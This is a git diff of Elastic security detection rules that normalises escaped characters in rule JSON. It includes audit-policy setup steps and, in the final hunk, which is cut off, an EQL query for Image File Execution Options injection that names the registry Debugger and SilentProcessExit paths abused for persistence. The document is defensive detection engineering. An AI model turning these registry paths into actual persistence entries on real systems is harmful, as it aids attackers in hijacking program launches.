diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json index 113c86ce89b..536177ba0e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_102.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json index 487e67d1ea9..c183107510f 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json index f2f94ac164d..2a64dbd2ff3 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json index 2d4433d6bb9..a87cb16d1e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json index 0ea8a4c8bc0..b4d6a5b76c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_4.json 
@@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "medium", "tags": [ "Elastic", 
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json
index ae38c50d820..88502e9acb0 100644
--- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_5.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json
index a09e9c5ec65..d52cb86bd5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_6.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json
index 5e6fe5e26b6..a337bbb46b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_7.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json
index 067e98ba00e..98f3297d9a5 100644
--- a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_8.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313",
- "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json
index c3e41177c72..d3677ee63dd 100644
--- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_102.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json
index f2aa0220e8a..afb47a1dbf0 100644
--- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_103.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json
index ca058f9edca..9b4eab02158 100644
--- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_104.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json
index f6db7240ad9..a3f75288fb4 100644
--- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json
index 7b5e0781af7..0e36302bf77 100644
--- a/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/6731fbf2-8f28-49ed-9ab9-9a918ceb5a45_206.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json
index 1181b2ba43f..00c471b9927 100644
--- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_101.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json
index a0c8a2ac872..c62d9c44dc8 100644
--- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_102.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json
index 3a7c848facf..60ad2199215 100644
--- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json
index b40057b4b6f..846eaf0de9d 100644
--- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_103.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json
index 2133244fe54..f66b6a779e2 100644
--- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_104.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json
index 2a3c4f034a8..903eed30b03 100644
--- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json
index 7d082f8465b..5f01c0fcc6d 100644
--- a/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7_206.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json
index 4bd5ee7b721..03a2876bdb2 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_105.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json
index 07f0f82cb0d..8447b5c725c 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_106.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json
index 9cb07332436..efcdb784da1 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_107.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json
index 420dedd6311..c8558f7b600 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_108.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json
index 3a90bc12415..bfffe4fe526 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_109.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json
index 104d512de49..0cec37aefdb 100644
--- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_110.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json
index ac3f3730793..38230f5aa42 100644
--- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_102.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Image File Execution Options Injection",
- "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
+ "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n 
